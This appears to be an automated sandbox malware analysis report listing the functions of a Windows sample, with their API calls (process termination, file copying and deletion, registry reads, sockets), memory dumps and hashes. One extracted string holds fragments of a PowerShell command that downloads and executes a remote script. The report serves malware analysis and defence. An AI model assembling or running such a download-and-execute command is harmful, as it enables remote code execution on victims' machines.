                                                                                                                                                                                                                                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          • API String ID: 2215929589-1989157005
                                                                                                                                                                                                                                                          • Opcode ID: cf1593323465116a95a21a3475c1557c006fdba61382aaa93de7a766626b3fd3
                                                                                                                                                                                                                                                          • Instruction ID: 67e7137c35237983837848a5de4156bf47954c74cde0e2e62bbff184e31e771a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1593323465116a95a21a3475c1557c006fdba61382aaa93de7a766626b3fd3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641B732D0021D9ACF50FBA6DC829DDB7B8BF04700F514566FA40B7122DBB97E46AB80
                                                                                                                                                                                                                                                          Function 6CD63A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6CD63A57
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CD63A5F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6CD63AE8
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CD63B13
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6CD63B68
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 734f88ae84928aa4bc25df349bbd2e5c93125aff60047da9e58f19eba61f3891
                                                                                                                                                                                                                                                          • Instruction ID: 351296bd1124951ffe37b5a25a2d5dee50b4681c3a97b87733b4cdc621a4ad06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 734f88ae84928aa4bc25df349bbd2e5c93125aff60047da9e58f19eba61f3891
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61417134A01258EFCF00CF6AC890ADEBBB5AF45318F14815AE9159BF61D731DA19CFA0
                                                                                                                                                                                                                                                          Function 00FF5FD4 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00FF6063
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF6080
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF609F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF60B3
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF60C6
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF60DA
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF60ED
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00FF5D0D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: HeapAlloc.KERNEL32(00000000), ref: 00FF5D14
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: wsprintfA.USER32 ref: 00FF5D2D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: FindFirstFileA.KERNEL32(?,?), ref: 00FF5D44
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: StrCmpCA.SHLWAPI(?,01015A80), ref: 00FF5D65
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: StrCmpCA.SHLWAPI(?,01015A84), ref: 00FF5D7F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: wsprintfA.USER32 ref: 00FF5DA6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF5E63
                                                                                                                                                                                                                                                            • Part of subcall function 00FF5CE8: DeleteFileA.KERNEL32(?), ref: 00FF5E86
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1546541418-0
                                                                                                                                                                                                                                                          • Opcode ID: 7df4cadde2e939801d587a455067e8f128d6d8439723736cf1389152f1ac7896
                                                                                                                                                                                                                                                          • Instruction ID: 097db5042e005457472e1ccc40ba673832dd93cf869383100440e893bdb5f5d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df4cadde2e939801d587a455067e8f128d6d8439723736cf1389152f1ac7896
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F051EAB1A0011C9FCB64DB64DC89ADDB7B9BB5C310F8044E6E709E3254EA34AB89DF54
                                                                                                                                                                                                                                                          Function 6CD684CF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,6CD685DE,00000000,6CD65DDF,00000000,00000000,00000001,?,6CD68757,00000022,FlsSetValue,6CDAEF80,6CDAEF88,00000000), ref: 6CD68590
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                          • Opcode ID: d4f8080c1c397432294b326b387f9b98cc97df787982153d01f5d966fd636033
                                                                                                                                                                                                                                                          • Instruction ID: b3eee63936de1b5d57023cb5af5a7bd74e750123298ecb68a9d43dc701cd61e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4f8080c1c397432294b326b387f9b98cc97df787982153d01f5d966fd636033
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721C671A01251EBEB119B67CC54A8A377CAB437A8F240617EB15A7EA0D730EA05C7E1
                                                                                                                                                                                                                                                          Function 6CD50EE0 Relevance: 10.6, APIs: 7, Instructions: 65networkCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WSASocketW.WS2_32(00000002,6CD52BD4,00000000,00000000,00000000,00000081), ref: 6CD50F0C
                                                                                                                                                                                                                                                          • WSAGetLastError.WS2_32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F24
                                                                                                                                                                                                                                                          • WSASocketW.WS2_32(00000002,6CD52BD4,00000000,00000000,00000000,00000001), ref: 6CD50F42
                                                                                                                                                                                                                                                          • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E), ref: 6CD50F54
                                                                                                                                                                                                                                                          • WSAGetLastError.WS2_32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F6B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F7C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 6CD50F8C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3114377017-0
                                                                                                                                                                                                                                                          • Opcode ID: f33a1d614218dc49c0a21fcab5106b62d4ebc46593e0e968a7ee9be7b2a37d7b
                                                                                                                                                                                                                                                          • Instruction ID: 9cf209f56bc9e359660d149dbfe8dccc663dae82997ce7c1dccf84536711906e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f33a1d614218dc49c0a21fcab5106b62d4ebc46593e0e968a7ee9be7b2a37d7b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B111B970244780EBFF214F24CD49B167BF8EB42B54F604519FA99DBAD0D7B5E4408720
                                                                                                                                                                                                                                                          Function 00FFF4C2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                          • String ID: throw(
                                                                                                                                                                                                                                                          • API String ID: 168861036-3159766648
                                                                                                                                                                                                                                                          • Opcode ID: 34961059821d3457211304a6bf64834a3401218a89d7f7b21d83fefc4cbc93e6
                                                                                                                                                                                                                                                          • Instruction ID: 73d97f1d5731a25c4019d555bef878b19da05f93455e2cbfb5de93f9464604d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34961059821d3457211304a6bf64834a3401218a89d7f7b21d83fefc4cbc93e6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A016D31A0020DAECF14DFA4DC92DBE3BB5EF44704F044068F6059B2A5DA789949AB84
                                                                                                                                                                                                                                                          Function 00FF2A89 Relevance: 10.5, APIs: 7, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,10000000), ref: 00FF2AAB
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00FF2ABF
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FF2AE5
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF2AF4
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF2AFB
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 00FF2B0E
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FF2B1E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                          • Opcode ID: 1f0e42c58fdc2b826cfc74297cd8eff8c3e4b27ba501be96d8ab1b2a04c4e758
                                                                                                                                                                                                                                                          • Instruction ID: 9b678a1a7a0f5b75f1eac2b685280e8df88bb8bd69fd4f6d8be6250c03c798bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f0e42c58fdc2b826cfc74297cd8eff8c3e4b27ba501be96d8ab1b2a04c4e758
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D11393090122DAFDF719F60AD5ABE97BB5BF08711F0040A9EB05A6194DB75AB80DF90
                                                                                                                                                                                                                                                          Function 00FF341D Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3330995566-0
                                                                                                                                                                                                                                                          • Opcode ID: f8689e4b1ecdbb16ffd98a97269be17d09f94b28f505f4c78383cda9b3df0136
                                                                                                                                                                                                                                                          • Instruction ID: ae6162adb9378a257fc5732fcb194bd13cb709ab55c7ce3470763ffc476e2da3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8689e4b1ecdbb16ffd98a97269be17d09f94b28f505f4c78383cda9b3df0136
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C931AE72E0010A9FCB25DF24DC85B79BBA8FF48715F194059EE06DB066D778CB01AB40
                                                                                                                                                                                                                                                          Function 00FF584C Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5881
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 00FF58A1
                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 00FF58C7
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF58D3
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF5902
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF5915
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
